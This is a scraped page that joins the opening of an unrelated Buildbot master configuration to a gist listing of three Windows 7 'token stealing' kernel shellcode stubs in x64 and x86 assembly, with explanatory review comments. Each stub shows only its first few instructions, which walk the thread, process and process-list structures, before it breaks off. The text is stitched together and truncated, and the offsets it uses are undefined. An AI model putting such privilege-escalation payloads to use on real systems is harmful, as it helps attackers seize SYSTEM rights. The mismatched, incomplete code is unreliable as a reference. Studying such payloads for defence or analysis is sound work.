
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
# -*- python -*-
# ex: set filetype=python:
'''
BUILDBOT Master Config for Chromium, WebkitGTK, and Firefox Builder
'''
from buildbot.plugins import *
from buildbot.changes.gitpoller import GitPoller
from buildbot.plugins import changes
achilles4828 / x64_7_2.asm
Created June 4, 2020 06:28
Windows 7 x64 Token Stealing Shellcode Stub with custom PID
[BITS 64]
; Compiled via NASM
; based on http://mcdermottcybersecurity.com/articles/x64-kernel-privilege-escalation
; start -- opening of the stub: four chained loads, each using the previous
; result as its base address. Only these loads are visible in this excerpt;
; the rest of the routine implied by the gist description is not shown.
; KTHREAD_OFFSET, EPROCESS_OFFSET and FLINK_OFFSET are not defined in the
; visible lines; kernel structure offsets like these differ between Windows
; builds, so the values belong to one specific target build.
; The visible part only reads kernel structures into registers; nothing is
; written here.
; NOTE(review): a gs-relative read reaches the _KPCR only when the code is
; already executing in kernel mode, i.e. this is a post-exploitation payload
; rather than a vulnerability in itself -- confirm against the cited article.
start:
mov rdx, [gs:KTHREAD_OFFSET] ; rdx = current thread: nt!_KPCR -> PrcbData -> CurrentThread
mov r11, [rdx + EPROCESS_OFFSET] ; r11 = owning process: nt!_KTHREAD -> ApcState -> Process
mov r12, [r11 + FLINK_OFFSET] ; r12 = nt!_EPROCESS -> ActiveProcessLinks -> Flink of that process
mov rcx, [r12] ; rcx = qword stored at the list entry r12 points to (author: "follow link into first process")
achilles4828 / x64_7_1.asm
Created June 4, 2020 06:09
Windows 7 x64 Token Stealing Shellcode Stub for current process
.code
PUBLIC get_token
; get_token -- visible opening of the routine: resolves the current process
; object through two chained loads, leaving the result in rax. The excerpt
; ends before any ENDP, so the remainder of the procedure is not shown.
; KTHREAD_OFFSET and EPROCESS_OFFSET are not defined in the visible lines;
; kernel structure offsets like these differ between Windows builds.
; NOTE(review): the gs-relative read reaches the _KPCR only in kernel mode,
; so this presumes code execution in ring 0 has already been obtained -- confirm.
get_token proc
; (author's note) required register cleaning -- no matching instruction is visible in this excerpt
; Get pointer to _EPROCESS Structure
xor rax, rax ; rax = 0, so the gs-relative address below reduces to KTHREAD_OFFSET
mov rax, gs:[rax + KTHREAD_OFFSET] ; rax = current thread: nt!_KPCR -> PrcbData -> CurrentThread
mov rax, [rax + EPROCESS_OFFSET] ; rax = owning process: nt!_KTHREAD -> ApcState -> Process
achilles4828 / x86_7.asm
Last active June 4, 2020 05:49
Windows 7 x86 Token Stealing Payload
.386
.model flat, stdcall
ASSUME FS:NOTHING
.code
PUBLIC get_token
get_token PROC
pushad; Save registers state
; Get pointer to _EPROCESS Structure